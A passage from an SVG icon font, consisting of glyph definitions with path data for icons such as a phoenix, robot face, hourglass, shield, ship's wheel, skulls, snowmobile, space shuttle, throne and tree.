1-8 1-11 2-62 13-117 41-164 83-68 62-107 139-117 230-1 8-4 16 8 20 57 23 115 44 176 52 14 2 31 0 42 6 29 16 59 29 91 39-26 3-53 4-80 1-110-12-213-48-310-101-9-5-11-10-9-20 25-127 92-225 200-295 60-39 125-61 197-67 11-1 14 2 13 13-1 22-2 45-3 67z" />
<glyph glyph-name="phoenix" horiz-adv-x="1000" unicode="&#xe817;" d="M182 152c-68 9-98 53-116 117 82-69 169-92 267-50-97-19-186-6-270 63h258c-31 9-62 14-92 27-60 27-82 71-64 135 25 85 83 150 142 214-52-132-25-244 79-339-57 71-102 147-90 242 11 93 67 160 141 224 0-18 0-28 0-38-1-133-2-266-3-399 0-8-6-20 5-24 9-4 20 2 28 8 14 13 29 24 27 48-2 24 19 42 42 42 22-1 40-19 40-41 0-24-18-43-42-42-17 1-28-6-39-17-10-11-22-24-16-38 5-11 22-5 33-5 137 1 273 2 410 3 3 0 6 0 16-1-62-73-130-129-223-140-95-12-171 33-241 90 42-49 92-83 155-98 63-15 124-2 184 19-60-55-121-109-200-137-78-28-131-1-156 78-8 24-13 48-18 73v-251c-55 33-79 134-64 263-43-68-28-157 44-262-55 4-95 43-114 111-27-15-54-28-85-16-30 11-32 15-9 37 48 49 98 98 146 147 6 6 15 10 15 21-13 2-17-8-22-14-51-50-102-100-151-151-16-17-23-11-30 7-13 28-10 48 13 94z m358 281c30 17 56 29 86 39-6-32-23-56-36-85-11 21-20 40-50 46z" />
<glyph glyph-name="robot-face" horiz-adv-x="1000" unicode="&#xe818;" d="M727 150l4 8c7 12 12 23 17 36h-87c-33-57-93-95-161-95s-128 38-161 95h-87c5-13 10-24 17-36l4-8-44-60c-2-2-2-6 0-8l65-68c1-1 5-2 7 0l57 47 8-5c20-12 42-21 65-28l9-2 8-76c1-2 3-5 6-5h91c3 0 6 2 6 5l9 76 9 2c22 7 44 16 64 28l8 5 57-47c2-2 6-1 8 0l65 68c1 2 2 6 0 8l-44 60z m-368 246c-22 0-40-19-40-43s18-42 40-42 41 19 41 42c0 24-18 43-41 43z m-125 203l-104 94c11 15 10 37-4 51-14 15-38 15-52 0-15-16-15-40 0-55 13-14 33-15 48-4l90-109 22 23z m407-203c-23 0-41-19-41-43s18-42 41-42c22 0 40 19 40 42 0 24-18 43-40 43z m193-30l-63 8c-6 25-15 49-28 71l40 52c6 8 5 20-2 27l-65 68c-6 7-18 8-26 2l-50-41c-21 12-43 22-67 29l-8 65c-1 10-10 19-19 19h-92c-9 0-18-9-19-19l-8-65c-24-7-46-17-67-29l-50 40c-8 7-19 6-26-1l-65-68c-7-7-8-19-2-27l39-53c-12-21-21-45-28-70l-62-8c-10-1-18-11-18-21v-95c0-10 8-20 18-21l63-8h542l63 8c10 2 18 11 18 21v96c0 10-8 19-18 20z m-393-24c0-2-2-4-4-5l-15-1c-1-6-4-12-6-17l9-12c1-1 1-4-1-6l-15-16c-1-1-4-1-6 0l-11 9c-5-3-10-5-16-6l-2-16c0-2-2-4-4-4h-21c-2 0-4 2-5 4l-1 16c-6 1-11 3-16 6l-11-9c-2-1-5-1-6 0l-15 16c-2 2-2 5-1 6l9 12c-2 6-5 11-6 17l-15 2c-2 0-4 2-4 4v22c0 3 2 5 4 5l15 2c1 6 4 11 6 16l-9 12c-1 2-1 5 1 6l15 16c1 2 4 2 6 0l11-9c5 3 10 5 16 7l2 15c0 2 2 4 4 4h21c2 0 4-2 5-4l1-15c6-2 11-4 16-7l11 9c2 2 5 1 6 0l15-16c2-1 2-4 1-6l-9-12c2-5 5-10 6-16l15-2c2 0 4-2 4-5h0l0-22z m281 0c0-2-2-4-4-5l-14-1c-2-6-4-12-7-17l9-12c1-1 1-4 0-6l-15-16c-2-1-5-1-6 0l-12 9c-5-3-10-5-15-6l-2-16c0-2-2-4-5-4h-21c-2 0-4 2-4 4l-2 16c-5 1-11 3-15 6l-12-9c-2-1-4-1-6 0l-15 16c-1 2-2 5 0 6l9 12c-3 5-5 11-7 17l-14 1c-2 1-4 3-4 5v22c0 3 2 5 4 5l14 2c2 6 4 11 7 16l-9 12c-1 2-1 5 0 6l15 16c2 2 5 2 6 0l12-9c4 3 10 5 15 7l2 15c0 2 2 4 4 4h21c3 0 5-2 5-4l2-15c5-2 10-4 15-7l12 9c1 2 4 1 6 0l15-16c1-1 1-4 0-6l-9-12c3-5 5-10 7-16l14-2c2 0 4-2 4-5h0l0-22z m205 402c-15 15-39 15-53 0-13-14-15-36-4-51l-104-94 22-23 90 109c15-12 35-11 49 3 14 16 14 41 0 56z" />
<glyph glyph-name="sand-clock" horiz-adv-x="1000" unicode="&#xe819;" d="M465 434c-26 39-47 82-59 127-2 6-1 13 2 18s8 9 13 9h158c5 0 10-3 13-9 3-5 4-12 2-18-12-45-33-88-59-127-12-18-19-41-19-64 0-11-7-20-16-20-9 0-16 9-16 20 0 23-7 46-19 64z m51-144c0 11-7 20-16 20-9 0-16-9-16-20 0-28-14-57-39-80-53-49-93-102-119-158-2-7-2-14 1-20 2-6 8-10 13-10h320c6 0 11 4 14 10 3 6 3 13 0 20-26 56-66 109-119 158-25 23-39 52-39 80z m296-338c0-22-15-40-32-40h-560c-17 0-32 18-32 40 0 22 15 40 32 40h10c11 155 84 274 140 358-56 84-129 203-140 358h-9c-18 0-32 18-32 40 0 22 14 40 32 40h559c17 0 32-18 32-40 0-22-15-40-32-40h-10c-11-155-84-274-140-358 56-84 129-203 140-358h9c18 0 33-18 33-40z m-106 40c-12 140-85 248-140 328l-3 4c-10 15-10 37 0 52l3 4c55 80 128 188 140 328h-412c12-140 85-248 140-328l3-4c10-15 10-37 0-52l-3-4c-55-80-128-188-140-328h412z" />
<glyph glyph-name="shield-alt" horiz-adv-x="1000" unicode="&#xe81a;" d="M502-88h-4c-1 1-2 2-3 2-52 26-100 58-144 96-62 53-113 115-146 190-22 51-36 104-36 159-1 106 0 212-1 318 0 19 7 31 21 42 21 17 45 28 71 36 49 17 100 25 151 29 13 1 25 0 38 4h102c19-2 37-4 56-6 49-4 97-13 144-31 25-10 50-21 70-42 7-7 10-15 10-25 0-105 1-210 0-315 0-63-14-124-42-181-43-89-109-157-188-215-31-23-65-43-99-61z m-2 443l260 0c22 0 22 0 22 22 0 85 0 171 0 257 0 8-3 14-7 20-18 19-40 29-63 38-66 24-135 29-205 31-7 0-7-3-7-9 0-32 0-65 0-98l0-261c-91 0-183 0-274 0-7 0-7-3-7-8 3-62 22-120 54-173 46-76 111-132 187-175 12-7 25-14 40-20l0 376z" />
<glyph glyph-name="ship-wheel" horiz-adv-x="1000" unicode="&#xe81b;" d="M934 365c-6 16-19 23-35 23-23 1-45 1-68 1-5 0-8 1-8 7-8 55-29 105-63 150-4 5-3 8 2 12 15 15 30 30 45 46 17 17 18 40 3 55-16 16-39 16-56-1-15-15-30-30-45-45-5-6-9-6-15-1-44 33-93 53-147 61-7 1-9 3-9 9 0 24 1 48 0 72-1 16-14 30-30 33-25 5-45-12-46-39 0-22 0-44 0-66 0-6-1-8-7-9-56-8-106-28-150-62-5-4-8-4-12 0-16 17-32 32-48 48-16 16-39 16-54 1-16-16-15-39 0-55 16-15 31-30 46-45 6-6 7-9 2-16-33-43-53-92-61-146-1-8-4-9-11-9-24 0-48 0-71-1-20-2-34-19-34-39 1-21 17-36 38-37 11 0 22 0 33 0v0c12 0 25 0 37 0 4 0 7-1 7-6 8-56 29-107 63-152 4-5 3-7-1-11-15-15-30-30-46-45-3-4-7-8-10-13-8-17-3-36 12-48 14-11 35-10 48 3 17 16 34 33 50 49 4 5 7 5 12 1 44-33 94-54 149-62 6-1 8-3 8-9 0-22 0-44 0-67 0-15 6-27 20-34 25-14 54 2 56 30 1 24 0 48 0 72 0 5 1 7 7 8 56 8 106 28 151 62 4 4 7 4 11 0 16-16 31-32 47-48 10-9 21-14 35-12 15 3 25 12 30 26 5 16 0 29-10 40-16 16-32 31-48 47-4 4-5 7-1 12 34 44 54 94 63 149 1 7 4 9 10 8 22 0 44 1 66 0 12 0 22 5 30 14 10 12 11 25 5 39z m-270-13c0-14-2-27-5-40 26 1 52 0 78 1 9 0 9-4 8-11-7-33-20-63-38-91-4-7-6-8-12-2-18 19-36 37-55 56-13-22-32-41-54-54 18-19 36-37 55-55 6-6 5-8-1-12-28-18-58-31-91-38-9-2-11 1-11 10 0 25 0 50 0 75-12-2-25-4-38-4-13 0-26 2-38 5 0-27 0-53 0-79 0-4 1-9-6-8-38 7-72 22-103 45 21 21 41 41 62 61-22 14-41 32-55 54-18-19-37-38-56-56-3-4-5-6-9 0-20 29-34 62-40 97-2 8 2 7 7 7h78c-2 11-4 23-4 36 0 14 2 27 5 40l-78 0c-7 0-10 1-8 9 7 33 20 64 38 92 4 6 7 8 13 1 18-19 36-37 55-55 13 22 32 40 54 54-19 18-37 38-57 56-5 5-4 7 1 11 29 19 60 32 94 39 7 1 9 0 9-8 0-26 0-53 0-79 13 3 27 5 41 5 12 0 24-2 35-4 0 26 0 51 0 77 0 8 2 10 10 8 33-7 64-19 92-38 7-5 6-7 1-12-18-17-35-35-52-52-1-1-2-2-4-3 22-13 41-32 55-54 15 16 31 31 46 47 16 16 16 16 28-4 15-25 25-51 31-79 2-11 2-11-9-11-26 0-51-1-77 0 3-12 5-25 5-37z m-162 104c-60 1-108-46-108-107-1-57 48-105 106-105 60 0 107 47 107 107 0 57-48 105-105 105z m47-65c-25 7-48 4-70-11-21-15-31-37-32-65-12 15-13 30-11 46 6 28 23 46 50 52 25 6 46-2 63-22z" />
<glyph glyph-name="skull-danger" horiz-adv-x="1000" unicode="&#xe81c;" d="M710 188c15-8 30-15 46-19 23-6 44 8 48 30 4 23-12 45-36 47-4 0-9 0-15 0 3 3 5 6 7 9 9 14 9 29 0 43-9 15-23 20-39 18-18-3-26-15-32-30-4-13-6-28-8-42-1-5-3-9-8-11-124-63-248-127-371-191-5-2-8-2-12 0-13 6-25 13-38 17-9 3-18 5-28 3-15-3-27-18-28-34-2-19 8-35 25-41 7-3 15-3 24-3-2-3-4-5-6-7-10-14-11-32-2-46 9-14 25-21 42-18 17 4 25 17 30 32 4 13 6 27 8 41 1 5 3 8 8 10 124 64 248 128 372 191 5 3 9 3 13 1z m-363 199c12-4 25-6 39-8 3 0 5-1 5-5l6-79c0-10 0-10 10-11 31-2 63-4 97-4 12-1 28 0 43 1 16 1 32 3 48 3 7 1 9 3 10 11 1 26 3 52 4 78 0 4 2 6 6 6 10 1 20 3 30 6 23 6 44 17 56 40 17 32 12 74-12 102-2 2-4 5-4 9 2 17 3 33 4 50 1 20 1 40-3 59-20 85-104 146-194 142-44-1-84-17-118-46-40-34-63-77-64-131 0-23 3-46 4-69 1-6 0-11-4-15-34-38-31-117 37-139z m243 171c42 0 75-33 75-75 1-41-33-75-74-75-42-1-76 33-76 75 0 41 34 75 75 75z m-81-207c3 5 8 5 11 0 4-6 4-13 4-20 0-6 0-12-4-18-3-6-8-6-11 0-6 12-6 25 0 38z m-19 0c4-6 5-13 5-20 0-6-1-12-4-18-4-6-8-5-11 0-6 8-6 29 0 38 3 5 7 5 10 0z m-79 207c41 0 74-35 74-76 0-41-35-75-77-74-41 0-74 34-73 75 0 43 34 76 76 75z m-162-388c15 5 28 12 42 18 3 2 6 2 11 0 43-22 86-44 129-67 3-1 5-3 8-1 18 9 36 18 54 27-2 3-5 3-7 4-53 28-106 55-159 82-5 2-7 6-8 11-2 16-4 31-10 46-4 11-10 20-22 24-15 6-34 1-44-11-12-14-13-33-3-47 2-3 4-6 7-11-4 1-7 1-9 1-28 2-48-24-41-50 7-24 27-34 52-26z m509-108c-17-4-32-12-48-20-4-2-7-2-11 0-44 23-87 45-130 67-3 1-5 4-9 2-17-9-35-18-53-28l4-3c53-27 105-54 158-80 10-5 14-11 15-21 2-16 5-32 13-47 9-16 27-23 45-17 18 6 29 23 27 41-1 11-7 20-14 29 7 0 12-1 18 0 21 5 35 26 31 47-5 22-24 35-46 30z m-355 200c0-10 5-16 14-16 8 0 13 6 13 16 0 15 0 15-16 16-12 1-11 3-11-10l0-6z m47 14c-13 0-13 0-13-13v-2c0-13 4-19 13-19 9 0 13 6 13 19 0 14 0 14-13 15z m136 2l-3 0c-13-2-15-4-13-18 2-6 6-10 12-10 10-1 15 5 15 19-1 11 2 10-11 9z m-116-29c0-7 6-12 12-12 7-1 13 4 14 11 1 4 1 8 1 12 0 14 0 14-14 14-3 0-6 0-9 1-3 0-4-2-4-5 0-7 0-14 0-21z m53 25c-5 0-10 0-15 0-3 0-5 0-5-3 0-8 0-16 1-24 1-7 7-11 14-10 6 0 11 5 12 12l0 3 0 18c0 4-2 5-7 4z m28 2c-14-1-14-1-14-15 0-3 0-5 0-7 1-8 7-13 14-12 6 0 12 5 12 12 0 3 0 7 0 10 0 12 0 12-12 12z" />
<glyph glyph-name="skull-face" horiz-adv-x="1000" unicode="&#xe81d;" d="M899 553c-1 26-5 51-10 76-3 11-8 21-14 32-16 30-38 55-64 77-30 27-64 47-100 63-42 19-86 32-131 40-5 1-10 1-15 2l-30-31 51-25-191-109 96 105-66 32 24 34c-33-2-66-7-99-16-47-13-91-32-131-62-48-35-83-81-106-136-5-13-8-26-10-40 0-5-1-10-1-14 0-2-1-4-1-5v-28c0-3 1-6 1-9 3-42 11-82 23-122 0-1 1-3 1-4 2-7 5-12 11-16 11-8 18-20 23-32 4-9 7-18 11-27 1-2 1-5 3-7 5-11 5-23 3-34-3-17-8-33-13-49-4-12-8-25-12-37-2-7-3-15-2-23 1-8 2-15 3-23 1-5 3-9 5-13 3-7 9-12 17-13 13-2 27-3 40 1 5 1 10 3 13 7 1 1 3 2 4 2 6 1 13 2 19 2 17 1 34-1 51-7 7-3 13-7 18-12 5-5 8-11 9-18 0-2-1-4-1-6-2-4-4-8-5-12-2-10 4-18 14-19 8-1 9 0 11 8 1 5 1 11 2 16 1 4 2 7 4 11 1 3 4 5 7 6 4 1 7-1 8-5 1-8 2-17 1-25 0-3-1-6-3-8-2-5-3-10-3-15 0-3 1-5 4-5 2-1 4-2 6-2 5-1 10-3 14-6 3-2 6-4 8-6 4-2 9-4 14-3 3 0 4 1 5 4 0 4 1 8 1 12 0 5 1 10 1 15 0 2 1 4 2 7 0 2 2 4 3 5 4 3 8 2 10-2 1-2 2-4 2-6 0-4-1-8-1-12 0-3-1-7 1-10 4-10 13-14 23-12 2 1 4 1 6 2 7 3 11 8 11 16 1 11 3 22 4 33 0 2 1 4 1 6 3 0 3-2 4-3 1-4 2-9 4-13 0-2 1-3 2-5 1 0 2-2 2-3 4-8 6-17 7-26 0-4 2-6 6-7 5-2 11-2 17-1 4 1 8 3 12 5 6 5 8 10 5 17 0 2-1 3-1 5 3 1 5-1 7-1 2-1 4-2 6-2l2-4c4-9 12-14 22-16 6-1 11 1 13 7 1 4 2 8 2 12 0 7 0 14 0 21 0 6 1 12 4 17 1 3 3 6 6 8 4 4 8 3 11-2 3-4 4-10 4-15l1-15c0-4 1-8 4-11 3-6 9-9 16-8 12 2 21 9 25 21 2 4 2 8 1 12l-4 13c-1 6-1 12 3 17 5 7 10 13 17 17 12 9 26 14 40 17 6 1 12 3 18 2 5-1 9-2 13-4 6-3 12-6 18-8 4-2 7-3 11-4 4-1 9-1 14 1 7 3 14 7 21 10 3 2 7 4 10 6 6 6 7 11 5 19-5 16-10 31-15 47-4 16-7 32-8 48-1 19 3 37 9 55 0 0 0 1 0 1 6 11 10 23 14 35 1 3 2 6 3 10 4 10 10 19 20 24 20 12 32 29 39 51 5 14 8 29 9 44 1 5 1 11 1 16 0 2 1 3 1 5v31c-1 2-1 4-1 6z m-477-213c-20-20-44-32-72-37-28-5-55-2-81 6-27 9-43 28-50 54-5 20-4 39 5 58 9 19 24 32 45 36 3 1 6 1 9 1 8 1 15 1 22 1 21 0 40-1 59-6 12-3 23-7 33-14 12-6 23-13 33-22 6-5 11-9 15-15 8-11 9-22 3-34-5-11-13-19-21-28z m127-123c-3 0-7 0-11 1-7 1-12 5-14 12-2 3-3 6-5 9-4 6-9 10-16 10-2 1-3 1-5 1-9 0-15-4-19-11-2-3-3-6-5-9-6-13-20-15-29-14-7 1-11 6-11 13 0 6 2 11 5 16 6 13 13 25 21 38 6 11 13 22 19 34 1 1 2 2 3 4 3 4 7 7 13 7h4c9 1 14-3 18-11 13-23 26-46 39-69 3-5 5-10 6-16 1-9-4-15-13-15z m212 133c-9-20-24-34-45-41-23-7-46-10-69-7-38 3-70 19-94 50-4 5-8 10-11 16-6 12-5 23 3 34 5 7 12 13 19 18 11 9 23 16 35 23 15 8 30 12 46 14 13 2 26 2 43 2 6 0 16 0 25-1 16-2 29-9 40-22 8-10 13-22 15-35 2-18 1-35-7-51z m-49-364c-4 11-5 23-6 35 0 23 0 45 0 68 0 5 0 10-1 16 0 5-1 10-4 14-4 4-8 5-12 2-2-2-4-5-6-7-4-5-5-11-7-17l-10-49c-1-5-4-10-8-13-4-4-8-5-13-3-3 1-6 3-9 4-8 4-16 7-25 8-7 0-13-3-15-10-2-4-3-9-4-13 0-3 0-6-1-10-5 1-10 1-15 2-2 0-3 1-4 2-2 2-3 3-4 5-2 4-6 6-11 7-10 3-15 0-18-9-1-2-1-4-2-6-6 0-12 0-18-1-1 1-1 2-1 3-1 3-2 6-3 9-2 3-3 3-6 3-2-1-3-1-5-1-2-1-4-2-4-4-1-1-1-2-1-4 0-1-1-2-3-2-2 0-4 0-5-1-4 0-6 1-8 4-5 6-10 10-18 13-7 2-13 0-18-5-2-2-3-5-5-7 0-1-1-2-2-2-4-1-9-2-13-2-1 1-1 3-2 4-2 4-5 7-10 9-6 3-11 1-15-4-1-3-2-5-3-8 0-2-1-3-1-6-6 1-11 1-16 1-1 0-2 1-2 2-1 1-2 3-2 5 0 3 0 7 0 10-1 4-2 6-5 8-3 2-7 2-11 3-6 0-12 1-18 2-1-1-2-2-3-3-4-5-7-5-11-1-2 1-4 3-5 5-4 4-8 9-12 13-3 4-5 8-7 13 0 2-1 3-1 5-1 9-2 18-4 26-2 12-7 22-16 30-7 7-12 5-15-4-1-4-1-9-1-14-1-19 2-38 7-56 1-6 3-12 4-18 3-12 2-26 2-39 1-10 0-19 1-29 0-10 1-20 5-30 4-11 11-19 23-22 7-2 15-3 22-3 2 0 4-1 6-1 18-7 36-14 54-21 3-1 6-2 9-3 16-4 31-10 45-19 4-3 8-6 12-8 7-5 15-8 24-9 2-1 3-1 5-2h26c1 1 3 1 4 1 10 1 19 4 28 9 3 2 6 4 9 5 4 2 9 4 13 4 3 1 6 1 9 2 19 3 34 12 43 29 1 1 2 3 3 4l20 23c4 5 10 9 16 12 6 2 12 4 19 5 5 1 10 3 15 6l13 9c7 5 10 13 8 22 0 1 0 3 0 4z" />
<glyph glyph-name="snowmobile" horiz-adv-x="1000" unicode="&#xe81e;" d="M118 214c10 51 38 90 79 120 45 32 96 48 150 58 12 2 24 4 37 5 5 1 7 2 7 7 0 38 0 75 0 112 0 6-2 8-8 7-20 0-41 0-62 0-16 0-27 10-27 24 0 15 10 25 27 25 63 0 126 0 189 0 15 0 25-8 27-20 3-10-3-21-13-26-5-3-9-3-14-3-20 0-41 0-61 0-6 0-9-1-9-8 0-36 0-72 0-108 0-4 1-7 2-11 9-19 18-39 26-58 4-10 11-14 21-14 109 0 218 0 327 0 14 0 18 3 22 16 16 50 33 100 49 150 2 8 5 9 11 4 22-19 34-43 31-71-8-75-30-145-65-211-4-8-9-10-17-10-120 0-240 0-360 0-119 0-239 0-358 0-9 0-13 1-11 12z m358 186c5-13 11-24 15-35 3-7 7-9 14-9 65 0 131 0 196 0 33 0 67 0 101 0 4 0 8 0 9 6 15 45 30 91 45 137-14-4-22-10-32-23-17-22-34-45-50-68-5-7-10-8-17-8-90 0-179 0-269 0l-12 0z m429-206h-809c-19 0-33-15-33-33s14-33 33-33h809c18 0 33 15 33 33s-15 33-33 33z" />
<glyph glyph-name="space-shuttle" horiz-adv-x="1000" unicode="&#xe81f;" d="M829 787c27 1 53-3 79-8 11-1 16-6 18-17 25-158-15-291-147-388-134-98-276-184-417-272-10-6-17-6-25 3-29 29-58 57-87 85-8 8-10 14-3 24 91 144 178 291 280 428 75 100 179 143 302 145z m-195-214c0-48 38-86 86-86 48 1 86 39 86 87-1 47-40 87-87 86-47 0-85-39-85-87z m-212 13c-42-66-82-128-121-189-6-10-11-10-21-6-52 25-105 23-158 4-12-5-25-9-34 4-10 14-3 26 7 36 37 37 74 75 112 112 29 28 65 39 105 39 35-1 71 0 110 0z m310-380c0-14 0-28 0-42-1-42-13-78-43-108-35-34-70-69-104-105-12-11-25-18-40-9-14 10-8 24-3 36 19 53 20 105-5 157-4 9-3 14 6 20 59 37 117 75 175 113 12 8 14 3 14-8 0-18 0-36 0-54z m-502-71c-29-17-48-39-44-74 2-18 14-29 31-30 35-5 56 16 72 44 38-31 40-29 21-77-13-36-44-54-81-63-46-13-94-11-141-19-6-1-12-2-20-4 12 56 8 112 23 166 10 35 29 62 62 77 38 18 48 15 77-20z" />
<glyph glyph-name="star-shape" horiz-adv-x="1000" unicode="&#xe820;" d="M500 776c7-18 13-35 19-51 29-82 58-164 87-246 2-5 4-7 10-7 104 0 208 0 313 0h8c-2-2-3-3-5-4-69-57-138-113-207-170-4-3-6-3-11 0-69 51-138 101-207 152-6 4-9 4-14 0l-207-151c-4-4-7-4-11 0-69 56-138 112-207 168-1 1-3 3-6 5h9c104 0 208 0 312 0 6 0 9 1 11 7 34 97 69 193 103 290 1 2 2 4 3 7z m245-740c-1 3-3 4-5 6-78 60-157 120-235 180-4 3-6 3-10 0-78-60-156-120-234-179-3-3-5-5-6-9-8-24-15-48-22-72-4-13-8-25-12-37 4 0 5 2 7 3 89 68 178 136 267 204 4 3 6 3 10 0 66-50 132-101 198-151 25-19 49-38 75-58 0 3 0 4 0 4-11 36-22 72-33 109z m-240 349c-4 3-6 3-10 0-58-45-116-89-175-134l-35-116 210 160c4 3 6 3 10 0 66-50 132-101 198-151l12-9-36 116c-58 45-116 89-174 134z m-220-250l0 0c0 0 0 0 0 0z" />
<glyph glyph-name="swirl" horiz-adv-x="1000" unicode="&#xe821;" d="M938 136c-3-15-4-29-8-44-23-75-73-123-148-144-107-31-220 24-270 127-13 26-20 53-24 81-13 82-76 149-159 164-82 15-163-29-193-105-25-67-1-143 58-177 49-29 110-21 146 18 26 29 33 70 16 103-15 29-47 45-75 36-17-5-28-15-32-33-1-8 0-14 5-21 5-7 17-11 24 0 4 7 12 7 19 1 8-6 11-18 7-29-7-21-30-34-54-30-36 6-62 39-61 78 1 47 38 88 86 96 64 12 126-28 146-92 22-69-8-144-71-182-68-41-158-32-217 21-53 48-76 107-69 177 9 93 75 169 165 195 54 16 108 13 161-8 57-22 113-22 168 6 59 30 95 78 102 145 9 87-47 158-121 174-66 15-133-21-153-82-15-45 0-93 36-118 33-22 76-19 100 8 13 15 18 32 12 51-5 16-18 25-32 23-11-1-16-9-12-20 2-4 1-9-2-12-5-6-11-8-18-7-15 3-27 18-28 35-2 30 22 57 54 62 43 7 84-21 98-66 14-47-6-101-51-130-53-35-126-27-174 19-59 56-69 147-23 216 35 54 86 82 150 87 3 1 6 0 8 2h10c3-1 6-1 9-2 62-4 113-31 152-79 70-88 66-218-10-304-17-18-37-33-55-50-64-62-78-162-33-238 39-65 115-98 186-80 76 19 122 91 108 162-12 59-65 99-121 92-43-6-77-42-74-84 2-24 19-45 41-50 15-4 31 3 37 15 4 10 0 19-10 21-11 2-15 10-11 20 3 10 14 18 27 18 21 1 42-14 48-37 8-28 1-52-18-72-31-32-83-36-123-10-43 28-63 83-49 136 18 66 83 115 163 106 76-8 138-67 153-143 1-10 1-20 4-30l0-16z" />
<glyph glyph-name="tattoo-wing" horiz-adv-x="1000" unicode="&#xe822;" d="M500 161c0 11 0 21 0 32 0 4-2 4-5 5-50 19-97 44-140 77-45 34-83 74-107 126-20 42-27 86-22 133 0 1 1 2 1 5 4-12 8-22 13-31 13-30 32-56 53-80 50-57 111-97 179-128l29-13c3-2 6-1 6 3 0 7 0 13 0 19 0 4-2 4-5 5-47 21-90 48-130 80-46 37-85 79-110 133-20 40-29 82-27 127 1 28 6 56 15 84 3-10 5-20 8-29 11-40 30-77 53-112 49-72 114-128 188-173 28-18 58-34 88-48 4-2 5-4 4-8-12-32-21-65-26-99-5-37-6-74-2-111 4-39 13-77 28-114 1-4-1-6-4-8-36-31-74-61-112-91-12-10-25-20-38-31-3-3-5-2-5 2-3 16-6 32-9 48-1 3 1 5 3 7 23 24 46 48 70 73 5 5 5 5-2 8-63 32-119 72-167 124-40 43-70 92-83 150-3 14-5 28-6 43 61-104 155-165 262-208z m-166 627c6-16 12-31 19-45 21-45 49-85 82-122 44-48 97-87 156-115 17-8 35-16 53-22 18-6 33-17 48-29 29-22 55-48 73-80 5-7 8-15 9-23 1-4 1-8 1-12-1-4-3-5-7-2-9 8-19 15-32 16-5 1-9 0-13-3-29-24-45-54-47-92-2-38 26-128 22-132-28-25-57-49-86-74-4-4-6-3-7 2-11 25-18 51-22 77-4 24-4 49-4 73 1 56 13 109 31 162 4 10 4 11-5 18-17 15-36 27-54 40-39 29-77 59-111 94-35 36-66 75-87 122-18 39-26 80-23 122 0 8 2 15 3 23 0 0 1 1 1 2z" />
<glyph glyph-name="throne" horiz-adv-x="1000" unicode="&#xe823;" d="M706 61c0-45 0-89 1-133 0-12-3-16-15-16-18 1-36 1-54 0-14 0-18 4-18 17 1 67 0 134 1 201 0 16-2 21-20 21-68-1-137-1-206 0-12 0-16-3-16-16 1-69 0-137 1-206 0-14-4-17-17-17-19 1-39 1-58 1-9-1-12 2-12 11l0 270c0 25 18 42 43 43 18 0 36 0 54 0 10 0 14 2 14 13 0 42-1 84 0 126 1 15-8 13-17 14-11 0-15-3-14-15 0-26-1-52 0-78 0-10-2-14-13-14l-171 0c-21 0-36 14-36 33 0 18 15 32 36 32 34 1 67 1 101 0 13 0 18 3 17 17-1 14 0 28 0 43 0 54 32 89 86 90 68 1 136 1 204 0 54-1 85-34 87-87 0-16 1-32 0-48-1-12 4-15 15-15 37 1 74 0 110 1 17 0 29-7 35-23 8-20-6-42-27-42-63-1-126-1-189-1-9 0-10 5-10 12 0 26 0 52 1 78 0 13-4 17-16 17-12-1-18-2-18-16 1-41 1-82 1-123-1-10 2-15 14-14 20 1 39 0 59 0 31 0 47-16 47-47 0-43 0-86 0-129z m140 27c0-53 0-107 1-161 0-11-3-15-15-14-27 0-55 0-83 0-8 0-11 2-11 11 0 109 0 218-1 327 0 12 5 14 15 14 26-1 53-1 79 0 12 0 16-4 16-16-1-53-1-107-1-161z m-692 1c0 53 0 107 0 160-1 13 4 16 16 16 27-1 53-1 80 0 10 0 13-4 13-13-1-109-1-218 0-326 0-11-4-14-14-13-27 0-53 0-80-1-12 0-16 3-15 16 0 53 0 107 0 161z m263-75c0 29 0 58 0 87 0 9 3 11 12 11 47 0 95 0 142 0 9 0 11-3 11-12 0-58 0-117 0-175 0-9-3-12-12-12-47 0-94 0-142 0-9 0-11 4-11 12 0 30 0 59 0 89z m82 502c-42-1-75 32-76 74-1 41 34 76 75 76 42 0 76-34 76-75 0-41-33-75-75-75z m30 224l-33 48-34-48-66 19 32-91c33 26 68 26 68 26s34 1 67-26l33 91-67-19z" />
<glyph glyph-name="tree-alt" horiz-adv-x="1000" unicode="&#xe824;" d="M421-88c30 30 56 61 62 105 3 21 2 41 1 62 0 7-3 12-10 16-33 18-64 39-105 35 30 23 64 18 99 17-14 45-32 87-57 125-15 23-41 29-69 24-34-7-68-10-101 1-9 4-19 7-30 16 43-10 78 1 111 18 19 10 38 20 61 19 10 0 9 7 9 14 0 36 3 73 20 106 2 2 3 5 4 7 17 28 16 28-3 54-19 26-42 45-72 56 14 3 19 2 37-4 29-9 53-25 74-45 9-9 13-7 21 1 33 35 43 78 47 124 1 4 1 8 1 15 9-22 9-42 9-62 1-21-1-42-8-63-7-20-16-38-27-55-10-18-24-33-28-59 56 33 114 23 170 26 54 2 64 7 105 37-9-20-38-42-70-52-34-12-70-14-106-20-33-5-60-21-85-44-13-12-7-25 0-36 20-32 46-58 69-88 4-5 7-7 14-3 36 21 73 16 110 5 36-11 72-21 109-2-23-30-56-38-90-41-21-2-43-1-63-8-25-9-31-23-19-47 37-74 55-153 42-236-1-6-2-12-4-18h-228z m-106 679c-43-26-95-23-134 8 39 36 101 32 134-8z m309 139c0-39-24-74-56-83-6-2-13-5-17-1-5 4 0 10 1 15 6 33 20 62 49 81 6 4 12 7 18 9 3 0 5-8 5-21z m195-90c20-42-4-100-47-114-8-2-12-1-12 9 2 45 19 81 59 105z m-109-187c39 20 78 19 117 2 14-6 5-12 0-17-33-32-86-25-117 15z m101-183c-12-2-14 3-9 16 14 34 37 57 74 66 7 1 13 2 12-9-1-38-37-73-77-73z m-132 322c13-43-1-78-31-108-8-8-12-6-15 4-15 41 0 86 46 104z m-46-254c-30 17-42 44-41 78 0 8 3 9 10 6 31-15 48-49 31-84z m-361-68c-3-37-28-67-60-76-18-5-21-2-17 16 7 38 29 60 65 69 12 3 13-1 12-9z m540-114c-35 0-65 23-72 53-2 9-1 12 9 12 35-2 64-14 85-44 10-14 4-18-9-20-5 0-10 0-13-1z m-512 201c1-7 0-18-6-21-5-4-13 4-19 8-27 16-42 39-43 71 0 9 1 13 12 11 32-7 56-35 56-69z m0 147c-13 1-32 2-37 15-4 10 13 19 24 26 20 14 43 19 68 14 8-1 12-4 7-13-15-25-31-41-62-42z m-121-187c-35 2-62 25-67 58-2 9 0 11 9 11 33 0 57-16 72-45 11-22 9-24-14-24z m578 20c0-31-22-59-49-67-6-2-9-1-12 6-11 34 16 75 52 77 16 0 6-11 9-16z m-462-279c-23 0-26 5-16 27 13 27 34 39 62 36 9 0 